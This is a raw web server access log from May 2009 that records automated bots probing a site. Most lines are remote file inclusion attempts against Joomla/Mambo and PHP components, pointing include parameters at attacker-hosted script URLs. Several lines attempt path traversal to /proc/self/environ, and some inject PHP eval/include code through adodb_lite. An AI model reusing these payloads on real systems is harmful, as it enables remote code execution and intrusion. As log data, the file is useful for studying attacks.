121.165.73.157 - - [22/May/2009:10:13:27 -0700] "GET /logs/access_080515.log%20%20/errors.php?error=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
70.146.70.105 - - [22/May/2009:10:13:28 -0700] "GET /logs/access_080707.log HTTP/1.1" 200 851968 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; GTB6; .NET CLR 1.0.3705; .NET CLR 2.0.50727)" "www.dmulk.com"
70.146.70.105 - - [22/May/2009:10:13:53 -0700] "GET /logs/access_080707.log HTTP/1.1" 200 2031616 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; GTB6; .NET CLR 1.0.3705; .NET CLR 2.0.50727)" "www.dmulk.com"
70.146.70.105 - - [22/May/2009:10:14:03 -0700] "GET /logs/access_080707.log HTTP/1.1" 200 1245184 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; GTB6; .NET CLR 1.0.3705; .NET CLR 2.0.50727)" "www.dmulk.com"
91.197.162.90 - - [22/May/2009:10:14:04 -0700] "GET /logs/access_090301.log/administrator/components/com_ongumatimesheet20/lib/onguma.class.php?mosConfig_absolute_path=http://www.ionthenet.co.kr/note_log/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.197.162.90 - - [22/May/2009:10:14:05 -0700] "GET /administrator/components/com_ongumatimesheet20/lib/onguma.class.php?mosConfig_absolute_path=http://www.ionthenet.co.kr/note_log/ec.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.197.162.90 - - [22/May/2009:10:14:05 -0700] "GET /logs/administrator/components/com_ongumatimesheet20/lib/onguma.class.php?mosConfig_absolute_path=http://www.ionthenet.co.kr/note_log/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.204.254.82 - - [22/May/2009:10:14:07 -0700] "GET /logs/board.php?see=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
212.204.254.82 - - [22/May/2009:10:14:07 -0700] "GET /logs/errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
212.204.254.82 - - [22/May/2009:10:14:08 -0700] "GET /board.php?see=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
212.204.254.82 - - [22/May/2009:10:14:08 -0700] "GET /logs/board.php?see=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
212.204.254.82 - - [22/May/2009:10:14:08 -0700] "GET /errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
212.204.254.82 - - [22/May/2009:10:14:08 -0700] "GET /logs/board.php?see=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
212.204.254.82 - - [22/May/2009:10:14:09 -0700] "GET /board.php?see=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
212.204.254.82 - - [22/May/2009:10:14:10 -0700] "GET /board.php?see=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
91.197.162.90 - - [22/May/2009:10:14:12 -0700] "GET /logs/access_081118.log/administrator/components/com_ongumatimesheet20/lib/onguma.class.php?mosConfig_absolute_path=http://www.ionthenet.co.kr/note_log/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.237.82.158 - - [22/May/2009:10:14:16 -0700] "GET /logs/access_080515.log/errors.php?error=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
65.98.38.250 - - [22/May/2009:10:14:16 -0700] "GET /logs/access_090301.log/administrator/components/com_ongumatimesheet20/lib/onguma.class.php?mosConfig_absolute_path=http://www.ionthenet.co.kr/note_log/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.98.38.250 - - [22/May/2009:10:14:19 -0700] "GET /administrator/components/com_ongumatimesheet20/lib/onguma.class.php?mosConfig_absolute_path=http://www.ionthenet.co.kr/note_log/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.98.38.250 - - [22/May/2009:10:14:19 -0700] "GET /logs/administrator/components/com_ongumatimesheet20/lib/onguma.class.php?mosConfig_absolute_path=http://www.ionthenet.co.kr/note_log/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
77.221.130.2 - - [22/May/2009:10:14:23 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.2 - - [22/May/2009:10:14:23 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.2 - - [22/May/2009:10:14:23 -0700] "GET /logs/access_090119.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.2 - - [22/May/2009:10:14:24 -0700] "GET /logs/access_090119.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.2 - - [22/May/2009:10:14:24 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.2 - - [22/May/2009:10:14:24 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.2 - - [22/May/2009:10:14:24 -0700] "GET /logs/access_090119.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.2 - - [22/May/2009:10:14:24 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.2 - - [22/May/2009:10:14:24 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.2 - - [22/May/2009:10:14:28 -0700] "GET /logs/access_080609.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.146.70.105 - - [22/May/2009:10:14:28 -0700] "GET /logs/access_080707.log HTTP/1.1" 200 1638400 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; GTB6; .NET CLR 1.0.3705; .NET CLR 2.0.50727)" "www.dmulk.com"
77.221.130.2 - - [22/May/2009:10:14:28 -0700] "GET /logs/access_080609.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.2 - - [22/May/2009:10:14:29 -0700] "GET /logs/access_080609.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.247.233.92 - - [22/May/2009:10:14:30 -0700] "GET /logs/access_071229.log//modules/vwar/admin/admin.php?vwar_root=http://indoirc.go.ro/idB.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
196.25.27.90 - - [22/May/2009:10:14:45 -0700] "GET /logs/access_090119.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.photolive.cz//components/com_joomlalib/standalone/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
196.25.27.90 - - [22/May/2009:10:14:45 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.photolive.cz//components/com_joomlalib/standalone/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
196.25.27.90 - - [22/May/2009:10:14:45 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.photolive.cz//components/com_joomlalib/standalone/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.251.81.216 - - [22/May/2009:10:14:49 -0700] "GET /logs/access_081202.log/str.php?lang=http://www.petitbijouonline.com/debug/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
196.25.27.90 - - [22/May/2009:10:14:50 -0700] "GET /logs/access_080609.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.photolive.cz//components/com_joomlalib/standalone/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.146.70.105 - - [22/May/2009:10:14:52 -0700] "GET /logs/access_080707.log HTTP/1.1" 200 1507328 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; GTB6; .NET CLR 1.0.3705; .NET CLR 2.0.50727)" "www.dmulk.com"
69.237.82.158 - - [22/May/2009:10:14:55 -0700] "GET /errors.php?error=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.108.66.227 - - [22/May/2009:10:14:55 -0700] "GET /logs/access_080611.log/components/com_joomlaboard/image_upload.php?sbp=http://h1.ripway.com/obi121/root1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.66.227 - - [22/May/2009:10:14:56 -0700] "GET /components/com_joomlaboard/image_upload.php?sbp=http://h1.ripway.com/obi121/root1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.66.227 - - [22/May/2009:10:14:56 -0700] "GET /logs/components/com_joomlaboard/image_upload.php?sbp=http://h1.ripway.com/obi121/root1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
200.93.147.154 - - [22/May/2009:10:14:56 -0700] "GET /logs/access_080315.log/ask_password.php?dir=http://h1.ripway.com/dinayu/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [22/May/2009:10:14:56 -0700] "GET /logs/ask_password.php?dir=http://h1.ripway.com/dinayu/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [22/May/2009:10:14:56 -0700] "GET /logs/access_080307.log/ask_password.php?dir=http://h1.ripway.com/dinayu/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [22/May/2009:10:14:56 -0700] "GET /ask_password.php?dir=http://h1.ripway.com/dinayu/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.237.82.158 - - [22/May/2009:10:14:59 -0700] "GET /logs/access_090510.log%20%20/errors.php?error=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
70.146.70.105 - - [22/May/2009:10:15:16 -0700] "GET /logs/access_080707.log HTTP/1.1" 200 1835008 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; GTB6; .NET CLR 1.0.3705; .NET CLR 2.0.50727)" "www.dmulk.com"
67.19.228.18 - - [22/May/2009:10:15:20 -0700] "GET /logs//lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.19.228.18 - - [22/May/2009:10:15:20 -0700] "GET /logs/access_080823.log//lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.19.228.18 - - [22/May/2009:10:15:20 -0700] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
121.165.73.157 - - [22/May/2009:10:15:22 -0700] "GET /logs/access_080515.log/errors.php?error=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.108.66.227 - - [22/May/2009:10:15:26 -0700] "GET /logs/access_081107.log/components/com_joomlaboard/image_upload.php?sbp=http://h1.ripway.com/obi121/root1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
65.98.38.250 - - [22/May/2009:10:15:39 -0700] "GET /logs/access_081118.log/administrator/components/com_ongumatimesheet20/lib/onguma.class.php?mosConfig_absolute_path=http://www.ionthenet.co.kr/note_log/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.146.70.105 - - [22/May/2009:10:15:44 -0700] "GET /logs/access_080707.log HTTP/1.1" 200 1900544 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; GTB6; .NET CLR 1.0.3705; .NET CLR 2.0.50727)" "www.dmulk.com"
72.30.79.60 - - [22/May/2009:10:15:48 -0700] "GET /logs/access_080929.log HTTP/1.0" 200 4442347 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
200.93.147.154 - - [22/May/2009:10:16:00 -0700] "GET /logs/access_080611.log/components/com_joomlaboard/image_upload.php?sbp=http://h1.ripway.com/yuni212/cinta.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.146.70.105 - - [22/May/2009:10:16:00 -0700] "GET /logs/access_080707.log HTTP/1.1" 200 1638400 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; GTB6; .NET CLR 1.0.3705; .NET CLR 2.0.50727)" "www.dmulk.com"
200.93.147.154 - - [22/May/2009:10:16:00 -0700] "GET /components/com_joomlaboard/image_upload.php?sbp=http://h1.ripway.com/yuni212/cinta.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.93.147.154 - - [22/May/2009:10:16:01 -0700] "GET /logs/components/com_joomlaboard/image_upload.php?sbp=http://h1.ripway.com/yuni212/cinta.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.228.18 - - [22/May/2009:10:16:09 -0700] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.19.228.18 - - [22/May/2009:10:16:09 -0700] "GET /logs//lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.19.228.18 - - [22/May/2009:10:16:12 -0700] "GET /logs/access_080823.log//lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
163.20.116.193 - - [22/May/2009:10:16:16 -0700] "GET //skin/zero_vote/setup.php?dir=http://expolady.com.ua//assets/site/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
163.20.116.193 - - [22/May/2009:10:16:16 -0700] "GET /logs/access_081205.log%20%20///skin/zero_vote/setup.php?dir=http://expolady.com.ua//assets/site/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
163.20.116.193 - - [22/May/2009:10:16:16 -0700] "GET /logs///skin/zero_vote/setup.php?dir=http://expolady.com.ua//assets/site/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.247.233.92 - - [22/May/2009:10:16:16 -0700] "GET /logs/access_080117.log//modules/vwar/admin/admin.php?vwar_root=http://indoirc.go.ro/idB.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.146.70.105 - - [22/May/2009:10:16:18 -0700] "GET /logs/access_080707.log HTTP/1.1" 200 1310720 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; GTB6; .NET CLR 1.0.3705; .NET CLR 2.0.50727)" "www.dmulk.com"
200.93.147.154 - - [22/May/2009:10:16:26 -0700] "GET /logs/access_081107.log/components/com_joomlaboard/image_upload.php?sbp=http://h1.ripway.com/yuni212/cinta.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.247.233.92 - - [22/May/2009:10:16:29 -0700] "GET /logs/access_080929.log//modules/vwar/admin/admin.php?vwar_root=http://indoirc.go.ro/idB.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.247.233.92 - - [22/May/2009:10:16:33 -0700] "GET /logs/access_080601.log//modules/vwar/admin/admin.php?vwar_root=http://indoirc.go.ro/idB.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.93.147.154 - - [22/May/2009:10:16:44 -0700] "GET /components/com_joomlaboard/image_upload.php?sbp=http://h1.ripway.com/dinayu/blk.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
200.93.147.154 - - [22/May/2009:10:16:45 -0700] "GET /logs/components/com_joomlaboard/image_upload.php?sbp=http://h1.ripway.com/dinayu/blk.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
200.93.147.154 - - [22/May/2009:10:16:45 -0700] "GET /logs/access_080611.log/components/com_joomlaboard/image_upload.php?sbp=http://h1.ripway.com/dinayu/blk.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
70.146.70.105 - - [22/May/2009:10:16:45 -0700] "GET /logs/access_080707.log HTTP/1.1" 200 1835008 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; GTB6; .NET CLR 1.0.3705; .NET CLR 2.0.50727)" "www.dmulk.com"
200.93.147.154 - - [22/May/2009:10:16:50 -0700] "GET /logs/access_080315.log%20%20/ask_password.php?dir=http://h1.ripway.com/dinayu/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
163.20.116.193 - - [22/May/2009:10:16:53 -0700] "GET /logs/access_090307.log%20%20///skin/zero_vote/setup.php?dir=http://expolady.com.ua//assets/site/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [22/May/2009:10:16:53 -0700] "GET /logs/components/com_joomlaboard/image_upload.php?sbp=http://h1.ripway.com/yuni212/andri.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
200.93.147.154 - - [22/May/2009:10:16:58 -0700] "GET /logs/access_080307.log%20%20/ask_password.php?dir=http://h1.ripway.com/dinayu/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.237.82.158 - - [22/May/2009:10:17:00 -0700] "GET /logs/errors.php?error=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [22/May/2009:10:17:01 -0700] "GET /logs/access_081107.log/components/com_joomlaboard/image_upload.php?sbp=http://h1.ripway.com/yuni212/andri.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
69.237.82.158 - - [22/May/2009:10:17:01 -0700] "GET /logs/access_090510.log/errors.php?error=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.237.82.158 - - [22/May/2009:10:17:01 -0700] "GET /errors.php?error=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
70.146.70.105 - - [22/May/2009:10:17:03 -0700] "GET /logs/access_080707.log HTTP/1.1" 200 1835008 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; GTB6; .NET CLR 1.0.3705; .NET CLR 2.0.50727)" "www.dmulk.com"
70.146.70.105 - - [22/May/2009:10:17:14 -0700] "GET /logs/access_080707.log HTTP/1.1" 200 1376256 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; GTB6; .NET CLR 1.0.3705; .NET CLR 2.0.50727)" "www.dmulk.com"
70.146.70.105 - - [22/May/2009:10:17:16 -0700] "GET /logs/access_080707.log HTTP/1.1" 200 786432 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; GTB6; .NET CLR 1.0.3705; .NET CLR 2.0.50727)" "www.dmulk.com"
200.93.147.154 - - [22/May/2009:10:17:31 -0700] "GET /logs/ask_password.php?dir=http://h1.ripway.com/gale232/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
70.146.70.105 - - [22/May/2009:10:17:32 -0700] "GET /logs/access_080707.log HTTP/1.1" 200 1638400 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; GTB6; .NET CLR 1.0.3705; .NET CLR 2.0.50727)" "www.dmulk.com"
200.93.147.154 - - [22/May/2009:10:17:33 -0700] "GET /ask_password.php?dir=http://h1.ripway.com/gale232/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [22/May/2009:10:17:33 -0700] "GET /logs/access_080315.log/ask_password.php?dir=http://h1.ripway.com/gale232/id1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [22/May/2009:10:17:33 -0700] "GET /logs/access_080307.log/ask_password.php?dir=http://h1.ripway.com/gale232/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.237.82.158 - - [22/May/2009:10:17:35 -0700] "GET /logs/access_080515.log%20%20/errors.php?error=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
212.150.52.114 - - [22/May/2009:10:17:57 -0700] "GET /logs/access_080227.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.jinyang-susan.co.kr/bbs/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
212.150.52.114 - - [22/May/2009:10:18:00 -0700] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.jinyang-susan.co.kr/bbs/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
212.150.52.114 - - [22/May/2009:10:18:00 -0700] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.jinyang-susan.co.kr/bbs/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.249.60.66 - - [22/May/2009:10:18:27 -0700] "GET /logs/access_081122.log//inc/header.php/step_one.php?server_inc=http://208.98.22.241/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
218.249.60.66 - - [22/May/2009:10:18:27 -0700] "GET /logs/access_090319.log//inc/header.php/step_one.php?server_inc=http://208.98.22.241/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
218.249.60.66 - - [22/May/2009:10:18:27 -0700] "GET /logs//inc/header.php/step_one.php?server_inc=http://208.98.22.241/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
218.249.60.66 - - [22/May/2009:10:18:27 -0700] "GET /inc/header.php/step_one.php?server_inc=http://208.98.22.241/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.32.100.130 - - [22/May/2009:10:18:46 -0700] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.jinyang-susan.co.kr/bbs/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.32.100.130 - - [22/May/2009:10:18:46 -0700] "GET /logs/access_080227.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.jinyang-susan.co.kr/bbs/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.32.100.130 - - [22/May/2009:10:18:46 -0700] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.jinyang-susan.co.kr/bbs/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [22/May/2009:10:19:00 -0700] "GET /logs/ask_password.php?dir=http://h1.ripway.com/roni121/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [22/May/2009:10:19:00 -0700] "GET /ask_password.php?dir=http://h1.ripway.com/roni121/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [22/May/2009:10:19:07 -0700] "GET /logs/access_080315.log%20%20/ask_password.php?dir=http://h1.ripway.com/roni121/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [22/May/2009:10:19:07 -0700] "GET /logs/access_080307.log%20%20/ask_password.php?dir=http://h1.ripway.com/roni121/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.237.82.158 - - [22/May/2009:10:19:12 -0700] "GET /logs/access_080515.log/errors.php?error=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [22/May/2009:10:20:03 -0700] "GET /logs/access_080315.log%20%20/ask_password.php?dir=http://h1.ripway.com/gale232/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.140.23.192 - - [22/May/2009:10:20:12 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.140.23.192 - - [22/May/2009:10:20:12 -0700] "GET /logs/access_080811.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
